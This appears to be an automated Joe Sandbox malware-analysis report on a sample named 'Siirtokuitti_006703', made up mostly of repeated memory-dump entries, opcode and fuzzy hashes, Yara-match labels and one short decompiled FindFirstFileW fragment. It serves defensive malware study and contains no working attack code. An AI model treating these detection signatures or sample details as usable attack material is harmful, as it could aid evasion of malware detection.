                                                                                                                      • String ID: \,
                                                                                                                      • API String ID: 0-257914950
                                                                                                                      • Opcode ID: 04c31069789fb7f30411e1fa406f1cef970a251dab467b93bd49b5094deb7163
                                                                                                                      • Instruction ID: a1e9b3bc5b6ec3b797784d193cfb528f4d31fb7694f748faf0d8449eec027634
                                                                                                                      • Opcode Fuzzy Hash: 04c31069789fb7f30411e1fa406f1cef970a251dab467b93bd49b5094deb7163
                                                                                                                      • Instruction Fuzzy Hash: CE220755D9E3D24EF74352B24A601D12FE4CE239A171A47EB80F3DACA3D19D098F8272
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19311035785.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3320000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: \,
                                                                                                                      • API String ID: 0-257914950
                                                                                                                      • Opcode ID: 232ecc3702cfd2d801c4221e9c42dad06ed543469a1b7e974287351c3f759a7f
                                                                                                                      • Instruction ID: 0bdb5473688d785747e7fb5bd0b95ba2e0454862bb1c42128a072602809ead8e
                                                                                                                      • Opcode Fuzzy Hash: 232ecc3702cfd2d801c4221e9c42dad06ed543469a1b7e974287351c3f759a7f
                                                                                                                      • Instruction Fuzzy Hash: EE324855D9E3D24EF34352B24A601D12FE4CE239A1B1A47EB84F7DACA3D19D098F8271
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19311035785.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3320000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: \,
                                                                                                                      • API String ID: 0-257914950
                                                                                                                      • Opcode ID: a8109b041965dd501c4ae15d9a407a218b677cfe1ff15afd5cf32a60c29d97bc
                                                                                                                      • Instruction ID: 5d123baca3858cfab19d1412a41c071ff8cf065d705a751e58b4a5f07bee38f2
                                                                                                                      • Opcode Fuzzy Hash: a8109b041965dd501c4ae15d9a407a218b677cfe1ff15afd5cf32a60c29d97bc
                                                                                                                      • Instruction Fuzzy Hash: E8221855D9E3D24EF34352B24A601D12FE4CE239A1B1A47EB84F7DACB3D19D098B8271
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19311035785.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3320000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: \,
                                                                                                                      • API String ID: 0-257914950
                                                                                                                      • Opcode ID: 78532cad1af896075d91fb4d56afd79c1062eebb413bafe881049798e689f867
                                                                                                                      • Instruction ID: 633f37f86a65fe3f613b462f98e96aa0c9353f6eff2d20a074643adc18db687e
                                                                                                                      • Opcode Fuzzy Hash: 78532cad1af896075d91fb4d56afd79c1062eebb413bafe881049798e689f867
                                                                                                                      • Instruction Fuzzy Hash: 27323A55D9E3D24EF34352B24A601D12FE4CE239A1B1A47EB84F7DACA3D19D098F8271
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19311035785.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3320000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: \,
                                                                                                                      • API String ID: 0-257914950
                                                                                                                      • Opcode ID: fcb60471709a7e823a550e0515f13de2e989e6bfa65946e25aece32b1fc4650c
                                                                                                                      • Instruction ID: 8e4ae715daa95d3c3bf4c6f0c97f6681caa2f4aadd2b754b48d72906e7fe716b
                                                                                                                      • Opcode Fuzzy Hash: fcb60471709a7e823a550e0515f13de2e989e6bfa65946e25aece32b1fc4650c
                                                                                                                      • Instruction Fuzzy Hash: 91220755D9E3D24EF74352B24E601D12FA4CE239A171A47EB84F3DACA3D19D098F8272
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19311035785.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3320000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: \,
                                                                                                                      • API String ID: 0-257914950
                                                                                                                      • Opcode ID: 79a305d0891bba7cb6cec37d8cbaeff02106506967ab559c322d78b99398a82b
                                                                                                                      • Instruction ID: 915b4f45093cf6ae0e085cb366eec5a3054a1a455bbc1e228032ef8d208cd8fe
                                                                                                                      • Opcode Fuzzy Hash: 79a305d0891bba7cb6cec37d8cbaeff02106506967ab559c322d78b99398a82b
                                                                                                                      • Instruction Fuzzy Hash: 23221B51D5E3D24EF34352B24E601912FA4CE239A1B1A47EB84F7DACA3D19D098F8272
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19311035785.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3320000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: \,
                                                                                                                      • API String ID: 0-257914950
                                                                                                                      • Opcode ID: a5613e3579ecdcf21ca37501a967162bf937e8c7619fe7ccc9b79a7042dad765
                                                                                                                      • Instruction ID: 47ada46400990b0030c21130fabdb3f79dcc944c4e2a226d48c00dfe866aa050
                                                                                                                      • Opcode Fuzzy Hash: a5613e3579ecdcf21ca37501a967162bf937e8c7619fe7ccc9b79a7042dad765
                                                                                                                      • Instruction Fuzzy Hash: 96220855D9E3D24EF74352B24E601D12FA4CE239A171A47EB84F3DACA3D19D098F8272
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19311035785.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3320000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: \,
                                                                                                                      • API String ID: 0-257914950
                                                                                                                      • Opcode ID: 8a6908cb3ab2834f12ea3a32fdc147792de1c06b0508c5441c05fcd4045c5ba7
                                                                                                                      • Instruction ID: aa64832c2f1a7c19ea96246727f616b39c9af6ef7752062d74e65bf51e8f792c
                                                                                                                      • Opcode Fuzzy Hash: 8a6908cb3ab2834f12ea3a32fdc147792de1c06b0508c5441c05fcd4045c5ba7
                                                                                                                      • Instruction Fuzzy Hash: 61221A51D9E3D24EF34352B24E601D12FA4CE239A1B1A47EB84F7DACA3D19D098F8271
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19311035785.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3320000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: \,
                                                                                                                      • API String ID: 0-257914950
                                                                                                                      • Opcode ID: e81537bf1ede52affb184ea6fe8d29424825734198d0475e2ea8075bec34ff67
                                                                                                                      • Instruction ID: 10fb941312da48786b51e0770092b3ef141fbc8a76a5baacd5677033f63c2818
                                                                                                                      • Opcode Fuzzy Hash: e81537bf1ede52affb184ea6fe8d29424825734198d0475e2ea8075bec34ff67
                                                                                                                      • Instruction Fuzzy Hash: 0E222A55D9E3D24EF34352B24A601D12FE4CE239A1B1A47EB84F7DACA3D19D098F8271
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19311035785.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3320000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: \,
                                                                                                                      • API String ID: 0-257914950
                                                                                                                      • Opcode ID: bf62e89efbc5579bfc4d89e65f59009bd02fa1f31867b903451f1ca3be60c8e3
                                                                                                                      • Instruction ID: 6830c61c63c7d67f6f140a93708b8316b1c835665931ad08267eeff741421075
                                                                                                                      • Opcode Fuzzy Hash: bf62e89efbc5579bfc4d89e65f59009bd02fa1f31867b903451f1ca3be60c8e3
                                                                                                                      • Instruction Fuzzy Hash: E3221955D5E3D24EF34352B24A601D12FE4CE239A1B1A47EB84F7DACA3D19D098F8271
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19311035785.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3320000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: \,
                                                                                                                      • API String ID: 0-257914950
                                                                                                                      • Opcode ID: 95b0fb0790bd5639c3f61e25772980eaee4b838cd1a3379b52995b6e85508b0b
                                                                                                                      • Instruction ID: e845443c34f4cdab3a2c344d1011da06bbbaaa5aea1956cd9b2e9e62e0d3fb1d
                                                                                                                      • Opcode Fuzzy Hash: 95b0fb0790bd5639c3f61e25772980eaee4b838cd1a3379b52995b6e85508b0b
                                                                                                                      • Instruction Fuzzy Hash: 13221A51D9E3D24EF74352B24E601D12FA4CE239A1B1A47EB84F7DACA3D19D098F8271
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19311035785.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3320000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: \,
                                                                                                                      • API String ID: 0-257914950
                                                                                                                      • Opcode ID: e6de05af34d4557879cc4a61aae9a087dce039deb5fd44af59bca20580e25a6c
                                                                                                                      • Instruction ID: 48b13f2b6d83315bb7eb8696e9e68276c0d4af73f72f9cfa34c51e460d998900
                                                                                                                      • Opcode Fuzzy Hash: e6de05af34d4557879cc4a61aae9a087dce039deb5fd44af59bca20580e25a6c
                                                                                                                      • Instruction Fuzzy Hash: 5D220955D9E3D24EF74352B24A601D12FA4CE239A171A47EB84F3DACA3D19D098F8272
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19311035785.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3320000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: \,
                                                                                                                      • API String ID: 0-257914950
                                                                                                                      • Opcode ID: 65c30382c75a67953e4799e7ff2c2e2a84ee0ae8170beda216da7c9e5ed13ba5
                                                                                                                      • Instruction ID: e1240df889407a56acb36c8a5bed1a359a80750305c0ec4553404ae1302eda23
                                                                                                                      • Opcode Fuzzy Hash: 65c30382c75a67953e4799e7ff2c2e2a84ee0ae8170beda216da7c9e5ed13ba5
                                                                                                                      • Instruction Fuzzy Hash: 8B221851D9E3D24EF34352B24A601D12FE4CE239A171A47EB84F3DACA3D19D098F8272
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19311035785.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3320000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: \,
                                                                                                                      • API String ID: 0-257914950
                                                                                                                      • Opcode ID: 32d1463571326a60e6580173391dc343397397b1d92e206c6b9f187f728826b1
                                                                                                                      • Instruction ID: 92d8d6a10df76fc5f1c378e243173dbd594a647f0e41112031507aaaff23b311
                                                                                                                      • Opcode Fuzzy Hash: 32d1463571326a60e6580173391dc343397397b1d92e206c6b9f187f728826b1
                                                                                                                      • Instruction Fuzzy Hash: FB221A55D9E3D24EF34352B24E601D12FA4CE239A1B1A47EB84F7DACA3D19D098F8271
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19311035785.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3320000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: X
                                                                                                                      • API String ID: 0-3081909835
                                                                                                                      • Opcode ID: 55685f64212aed0e38f00deeb1bcce064b805c22e6dbf356fb6f7637e6bff078
                                                                                                                      • Instruction ID: 3421b4a1c9bc34e243ab84bd36695d65c2e64cb841b84497ee4a84dc6e8e9946
                                                                                                                      • Opcode Fuzzy Hash: 55685f64212aed0e38f00deeb1bcce064b805c22e6dbf356fb6f7637e6bff078
                                                                                                                      • Instruction Fuzzy Hash: 11028755D9E3D24EF74352B24E601D12FA4DE239A171A47EB80F3DACA3D19D098F8272
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19420855305.0000000009150000.00000040.80000000.00040000.00000000.sdmp, Offset: 09150000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_9150000_Siirtokuitti_006703.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (
                                                                                                                      • API String ID: 0-3887548279
                                                                                                                      • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                                                      • Instruction ID: ebbc603c0f991abf9d484955df85d67883f73401934b12b25ddde2c0c8c2f601
                                                                                                                      • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                                                      • Instruction Fuzzy Hash: 47021CB6E006189BDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D7746A418F80
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19420855305.0000000009150000.00000040.80000000.00040000.00000000.sdmp, Offset: 09150000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_9150000_Siirtokuitti_006703.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (
                                                                                                                      • API String ID: 0-3887548279
                                                                                                                      • Opcode ID: 14310d3cf581053f0f2ef071170df6038433c21c653cbf7e837f880ee9eefc50
                                                                                                                      • Instruction ID: 72ea266da08cbd2550270463548cbb52802536e1f6f80c89ce71f9abf8ee2ec2
                                                                                                                      • Opcode Fuzzy Hash: 14310d3cf581053f0f2ef071170df6038433c21c653cbf7e837f880ee9eefc50
                                                                                                                      • Instruction Fuzzy Hash: FE020BB6E006189BDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 39%
                                                                                                                      			E00402862(short __ebx, short* __esi) {
                                                                                                                      				void* _t21;
                                                                                                                      
                                                                                                                      				if(FindFirstFileW(E00402C37(2), _t21 - 0x2d4) != 0xffffffff) {
                                                                                                                      					E004062F7( *((intOrPtr*)(_t21 - 0xc)), _t8);
                                                                                                                      					_push(_t21 - 0x2a8);
                                                                                                                      					_push(__esi);
                                                                                                                      					E004063B0();
                                                                                                                      				} else {
                                                                                                                      					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                                                                                                                      					 *__esi = __ebx;
                                                                                                                      					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                                                                                      				}
                                                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
                                                                                                                      				return 0;
                                                                                                                      			}




                                                                                                                      0x0040287a
                                                                                                                      0x00402895
                                                                                                                      0x004028a0
                                                                                                                      0x004028a1
                                                                                                                      0x004029db
                                                                                                                      0x0040287c
                                                                                                                      0x0040287f
                                                                                                                      0x00402882
                                                                                                                      0x00402885
                                                                                                                      0x00402885
                                                                                                                      0x00402ac2
                                                                                                                      0x00402ace

                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402871
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileFindFirst
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1974802433-0
                                                                                                                      • Opcode ID: 6ed643d52b37ba0c9ab8684d892a9ab2888b034d4db1f30fc2936da7cdff1a1a
                                                                                                                      • Instruction ID: 1506565ccd7b679c7f55cec76d0c208d7a3b57e4c41f2eb52868ec6bdbdc004a
                                                                                                                      • Opcode Fuzzy Hash: 6ed643d52b37ba0c9ab8684d892a9ab2888b034d4db1f30fc2936da7cdff1a1a
                                                                                                                      • Instruction Fuzzy Hash: 38F05E71A04104ABD710EBA4DA499ADB368EF00314F2005BBF541F21D1D7B84D919B2A
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19311035785.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3320000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 4a184f88e50c5c3477a9cc8e819aba01bf34373b99b0cb91bbcd6d90d25e6076
                                                                                                                      • Instruction ID: 93755ea7c94554ded997f990c563d6a6adf62f70850eb5563ed691fb94bad143
                                                                                                                      • Opcode Fuzzy Hash: 4a184f88e50c5c3477a9cc8e819aba01bf34373b99b0cb91bbcd6d90d25e6076
                                                                                                                      • Instruction Fuzzy Hash: CD12F455D9E3D24EF74352B24E611D12FA4CE239A171A47EB80F3DACA3D19D098F8272
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19311035785.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3320000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 609aebf0b677b8c8059e2d50e2886d0926bc4c5812fd60dd95788476024ebe75
                                                                                                                      • Instruction ID: 5bebd3d0a0cbc69100ff19a4af27c35b00e295c71be91675644cf988ad9ca92e
                                                                                                                      • Opcode Fuzzy Hash: 609aebf0b677b8c8059e2d50e2886d0926bc4c5812fd60dd95788476024ebe75
                                                                                                                      • Instruction Fuzzy Hash: 4A12F355D9E3D24EF34352B24E611D12FA4CE239A171A47EB84F3DACA3D19D098F8272
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19311035785.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3320000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d72493d3c76947a0905a70b839077e9bf9bdca847618604279e2159e1dc3382f
                                                                                                                      • Instruction ID: c419ad1c4d740ad1bc2eb71df7e4c70075edcff5b669abafbd03d07beb76b193
                                                                                                                      • Opcode Fuzzy Hash: d72493d3c76947a0905a70b839077e9bf9bdca847618604279e2159e1dc3382f
                                                                                                                      • Instruction Fuzzy Hash: 4112F555D9E3D24EF74352B24A601D12FA4CE239A171A47EB84F3DACA3D19D098F8272
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19311035785.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3320000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 66ba74cfb7e329cd1d7a6053868425589a323390e4bf86a866f08b8c1fab8a77
                                                                                                                      • Instruction ID: 45d36a37e6d337a9d5862d321247ee8492b240fa98528565917d74d320726e0e
                                                                                                                      • Opcode Fuzzy Hash: 66ba74cfb7e329cd1d7a6053868425589a323390e4bf86a866f08b8c1fab8a77
                                                                                                                      • Instruction Fuzzy Hash: B512C055D9E3D24EF34352B24E611D12FA4CE239A171A47EB80F7DACA3D19D098F8272
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19311035785.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3320000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 208a132f7f16a103fb81de9a319097eb9c2cdb769724485c0f163f57044f9685
                                                                                                                      • Instruction ID: 9018934f543df45011f4702a0983cae8d4bfe53aae7d5e8db5dfee6a00511a22
                                                                                                                      • Opcode Fuzzy Hash: 208a132f7f16a103fb81de9a319097eb9c2cdb769724485c0f163f57044f9685
                                                                                                                      • Instruction Fuzzy Hash: CC12D055D9E3D24EF34352B24E611D12FA4CE239A171A47EB80F7DACA3D19D098F8272
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19311035785.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3320000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 309335516c35226ad68d1c7d0ea4aa9f21c95fb43d782e4749ec72329faa2235
                                                                                                                      • Instruction ID: 0464487c9f39de28340553b4af78bdedf1ceb4c6f67def0dabe573849bd12539
                                                                                                                      • Opcode Fuzzy Hash: 309335516c35226ad68d1c7d0ea4aa9f21c95fb43d782e4749ec72329faa2235
                                                                                                                      • Instruction Fuzzy Hash: 7102BC15D9E3D24EF74352B24E611D12FA4CE239A171A47EB80F3DACA3D19D098F8272
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19311035785.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3320000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 48273a1568896c5b984491f44b263a6e5d467c1c1c4639f51737323993c69df4
                                                                                                                      • Instruction ID: 4f699598c0f31ebeb114c84732d2f464d7ad13b298e88a485c6483833cbc6bd1
                                                                                                                      • Opcode Fuzzy Hash: 48273a1568896c5b984491f44b263a6e5d467c1c1c4639f51737323993c69df4
                                                                                                                      • Instruction Fuzzy Hash: DF02BC55D9E3D24EF34352B24E611D12FA4CE239A171A47EB80F7DACA3D19D098F8272
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19311035785.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3320000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 37b6fb0fffea2e0cbe02d4f2c6e1d3f444e0ee85d166e3af3c27bf22ddc761d5
                                                                                                                      • Instruction ID: 9aec3a282fb1f9577ecb52203453c4f32c0ab6139c282e4c6894f9a110c994a1
                                                                                                                      • Opcode Fuzzy Hash: 37b6fb0fffea2e0cbe02d4f2c6e1d3f444e0ee85d166e3af3c27bf22ddc761d5
                                                                                                                      • Instruction Fuzzy Hash: 2912E255D9E3D24EF34352B24E611D12FA4CE239A171A47EB80F3DACA3D19D098F8272
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19311035785.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3320000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
